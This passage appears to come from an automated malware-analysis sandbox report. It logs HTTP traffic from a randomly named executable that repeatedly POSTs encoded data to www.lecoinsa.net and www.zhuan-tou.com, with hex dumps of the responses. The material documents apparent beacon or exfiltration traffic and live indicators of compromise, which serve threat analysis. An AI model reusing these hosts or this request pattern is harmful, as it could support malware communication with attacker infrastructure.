                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                      Jun 10, 2024 10:23:06.427575111 CEST212INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.
                                      Jun 10, 2024 10:23:06.427611113 CEST1236INData Raw: 33 38 37 2c 31 2e 36 38 32 2c 33 2e 34 36 31 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20
                                      Data Ascii: 387,1.682,3.461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"
                                      Jun 10, 2024 10:23:06.427648067 CEST1236INData Raw: 38 33 2e 39 37 32 2c 32 2e 34 33 36 63 33 36 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67
                                      Data Ascii: 83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" st
                                      Jun 10, 2024 10:23:06.427684069 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-wi
                                      Jun 10, 2024 10:23:06.427716017 CEST636INData Raw: 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30
                                      Data Ascii: 65" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </
                                      Jun 10, 2024 10:23:06.427750111 CEST1236INData Raw: 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c
                                      Data Ascii: "295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898"
                                      Jun 10, 2024 10:23:06.427783012 CEST1236INData Raw: 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: 84.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                      Jun 10, 2024 10:23:06.427819967 CEST424INData Raw: 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d
                                      Data Ascii: " stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx=
                                      Jun 10, 2024 10:23:06.427855015 CEST1236INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                      Data Ascii: <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle
                                      Jun 10, 2024 10:23:06.433042049 CEST1236INData Raw: 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35
                                      Data Ascii: 3.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.551403217.116.0.191802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:11.656632900 CEST714OUTPOST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 49 2f 38 56 55 49 6b 44 37 33 50 69 39 62 71 6d 78 34 4e 79 50 6c 37 4c 4a 38 4a 64 57 34 42 38 55 6a 56 5a 4a 44 33 38 46 6a 4b 56 30 63 71 6f 4b 4f 64 33 65 43 71 71 39 6e 64 62 36 43 41 39 74 5a 43 48 77 44 4e 34 4e 76 64 58 32 59 41 41 30 72 46 6c 53 34 52 35 66 78 46 66 31 4f 4e 56 35 66 52 50 59 51 30 78 71 6c 62 49 2f 6a 45 47 33 50 4d 78 77 4a 6a 47 43 6b 37 6d 35 69 69 42 38 72 4f 6a 6a 32 4f 42 2f 44 34 51 66 70 38 2f 6c 34 61 34 74 71 39 52 34 42 51 7a 75 75 74 77 48 71 73 70 32 63 32 72 66 6b 67 66 33 33 45 54 76 52 44 37 7a 38 73 6e 79 66 38 3d
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBI/8VUIkD73Pi9bqmx4NyPl7LJ8JdW4B8UjVZJD38FjKV0cqoKOd3eCqq9ndb6CA9tZCHwDN4NvdX2YAA0rFlS4R5fxFf1ONV5fRPYQ0xqlbI/jEG3PMxwJjGCk7m5iiB8rOjj2OB/D4Qfp8/l4a4tq9R4BQzuutwHqsp2c2rfkgf33ETvRD7z8snyf8=
                                      Jun 10, 2024 10:23:12.554663897 CEST598INHTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.551404217.116.0.191802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:14.199444056 CEST734OUTPOST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 4a 66 67 56 57 72 38 44 75 6e 50 68 6a 72 71 6d 2f 59 4e 32 50 6c 2f 4c 4a 34 52 33 57 71 6c 38 56 43 6c 5a 49 47 4c 38 49 44 4b 56 73 4d 71 68 4f 4f 63 31 65 43 58 66 39 6e 52 62 36 42 38 39 74 63 75 48 77 54 78 35 4d 2f 63 78 39 34 41 43 70 37 46 6c 53 34 52 35 66 31 55 30 31 4f 46 56 35 4f 42 50 61 78 30 79 69 46 61 36 34 6a 45 47 38 76 4e 32 77 4a 69 56 43 6c 32 7a 35 6e 6d 42 38 71 2b 6a 67 69 53 43 77 44 34 57 41 5a 39 44 74 34 66 52 31 4c 31 41 2f 7a 56 74 36 49 35 4b 50 38 42 44 73 2b 2b 44 4d 45 4d 6e 6e 6b 4d 6b 2b 68 69 53 70 66 38 58 73 49 71 4d 34 61 4c 37 73 46 38 4c 2b 66 63 66 37 4a 59 46 73 4e 42 7a
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wql8VClZIGL8IDKVsMqhOOc1eCXf9nRb6B89tcuHwTx5M/cx94ACp7FlS4R5f1U01OFV5OBPax0yiFa64jEG8vN2wJiVCl2z5nmB8q+jgiSCwD4WAZ9Dt4fR1L1A/zVt6I5KP8BDs++DMEMnnkMk+hiSpf8XsIqM4aL7sF8L+fcf7JYFsNBz
                                      Jun 10, 2024 10:23:15.082091093 CEST598INHTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:14 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.551405217.116.0.191802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:16.728379011 CEST1751OUTPOST /xu8t/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lecoinsa.net
                                      Referer: http://www.lecoinsa.net/xu8t/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 4a 66 67 56 57 72 38 44 75 6e 50 68 6a 72 71 6d 2f 59 4e 32 50 6c 2f 4c 4a 34 52 33 57 71 74 38 56 30 52 5a 48 42 66 38 4a 44 4b 56 67 73 71 6b 4f 4f 64 74 65 43 50 62 39 6e 4d 73 36 45 77 39 74 2b 6d 48 6e 52 56 35 46 2f 63 78 79 59 41 50 30 72 45 68 53 38 4e 31 66 78 77 30 31 4f 46 56 35 4e 4a 50 4a 41 30 79 76 6c 62 49 2f 6a 46 48 33 50 4e 53 77 49 47 46 43 6c 79 6a 35 55 65 42 38 4b 75 6a 7a 6e 4f 43 76 7a 34 55 44 5a 39 62 74 35 6a 4b 31 4c 35 4d 2f 79 68 4c 36 50 4e 4b 66 4c 77 76 2b 4e 61 31 58 55 6f 68 6a 46 59 58 69 41 58 31 67 4e 30 7a 68 72 79 6a 36 37 6e 4c 70 31 63 63 2f 4f 4e 6a 70 34 51 54 74 36 74 39 39 51 4d 69 6f 53 46 50 31 68 68 34 6b 64 45 77 6e 36 2f 39 36 2b 34 52 49 2b 64 30 4d 32 4e 41 55 2f 79 71 50 7a 4c 2b 38 2b 73 35 36 77 31 43 42 64 30 78 41 41 54 75 2b 4f 4e 64 6f 2b 49 66 54 50 71 46 49 4e 67 64 2f 51 64 57 4a 76 4e 70 36 37 68 52 6c 74 4b 6a 62 78 77 53 6e 71 52 50 70 7a 75 4f 6b 43 49 44 39 69 59 6f 49 57 [TRUNCATED]
                                      Data Ascii: TTv82Lg=lJrJBWTk60MBJfgVWr8DunPhjrqm/YN2Pl/LJ4R3Wqt8V0RZHBf8JDKVgsqkOOdteCPb9nMs6Ew9t+mHnRV5F/cxyYAP0rEhS8N1fxw01OFV5NJPJA0yvlbI/jFH3PNSwIGFClyj5UeB8KujznOCvz4UDZ9bt5jK1L5M/yhL6PNKfLwv+Na1XUohjFYXiAX1gN0zhryj67nLp1cc/ONjp4QTt6t99QMioSFP1hh4kdEwn6/96+4RI+d0M2NAU/yqPzL+8+s56w1CBd0xAATu+ONdo+IfTPqFINgd/QdWJvNp67hRltKjbxwSnqRPpzuOkCID9iYoIWFS03vcWWsb2WOGbwobbGE5aAwO8+WKNa5LCjr8pbksPLdEdWUFGPDgZoq8hWmNO9ajM8ax+JQWWJf0AuJX/Vp70WV01XFx98Uly/1XFo2zS7YyLIwy6oeX5j5O61IjLu0iQm4hknxDISMgw7aSFifkXiW71a22MQNem7ehsu7x0dr4MI8LtWAoMcHxjXHIYf7QGKE+QOflrr9Il0mvxKmlt/KFytYGFenGjXL9f1c7In3+O2nTYenKJTdszEtNmHXg0xCVrfYLoxqHSoID1myjpcI57uGSCSVl7rMf2CWzvAzqvFE4dNhIkjjoTjjOG4BcWLO2iZiN19Cv1pKCg1PFw6yCsyerzaqdt6U/fHWjjeKvwf2++itq95qdJIDANwCWDfJbt1o1hxrhIIZZ8SvokER5+NCYAIk0docDG13yYKfDbCXC4eEdTmRk+WuuMMCVAH0G0DV67jRHxFpCkByvh/OjDfdv9ZNB5u60XRu975j0SVHsWv36gjOmXgYDE7ABi2vRB19SdauCxVbf96MPPh9memMx6LOJY8D0UPCxbgPO6y8znt5wwH3653YZI2/xen9t5vzlelY6RtwzxbBogS8Jzwjmu38hh/hftzPrRxQyiYTRpu1jQXECI2cLpTsW9E9Y4Rt72SxkdEhPkVNlqIxkgkXoXzuz [TRUNCATED]
                                      Jun 10, 2024 10:23:17.595701933 CEST598INHTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/
                                      Origin-Agent-Cluster: ?0
                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.551406217.116.0.191802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:19.260036945 CEST455OUTGET /xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lecoinsa.net
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:20.142914057 CEST1236INHTTP/1.1 301 Moved Permanently
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:20 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 978
                                      Connection: close
                                      Location: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==
                                      Origin-Agent-Cluster: ?0
                                      Age: 0
                                      X-Cache: MISS
                                      X-BKSrc: 0.6
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3f 6b 48 3d 30 30 55 38 45 4e 4c 48 6b 26 61 6d 70 3b 54 54 76 38 32 4c 67 3d 6f 4c 44 70 43 6e 62 4e 35 45 4d 74 56 76 4e 75 45 59 77 36 67 68 33 37 38 62 36 38 37 62 4a 78 50 54 6e 41 53 63 5a 58 48 4b 78 68 4a 6b 31 4f 4d 78 53 52 47 41 43 64 30 49 75 69 43 4e 6c 6b 59 41 72 56 36 46 38 76 7a 6b 34 49 30 4f 71 7a 68 52 45 75 4b 66 51 6e 6f 50 4d 64 6f 65 78 6b 54 34 4a 57 61 6a 78 76 31 70 77 32 75 6f 38 46 66 78 49 49 76 6b 4c 6b 6a 6a 74 46 39 65 63 38 6b 51 3d 3d 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ=='" /> <title>Redirecting to http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==">http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp
                                      Jun 10, 2024 10:23:20.142935991 CEST166INData Raw: 3b 54 54 76 38 32 4c 67 3d 6f 4c 44 70 43 6e 62 4e 35 45 4d 74 56 76 4e 75 45 59 77 36 67 68 33 37 38 62 36 38 37 62 4a 78 50 54 6e 41 53 63 5a 58 48 4b 78 68 4a 6b 31 4f 4d 78 53 52 47 41 43 64 30 49 75 69 43 4e 6c 6b 59 41 72 56 36 46 38 76 7a
                                      Data Ascii: ;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8vzk4I0OqzhREuKfQnoPMdoexkT4JWajxv1pw2uo8FfxIIvkLkjjtF9ec8kQ==</a>. </body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.551407103.120.80.111802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:25.926445961 CEST717OUTPOST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
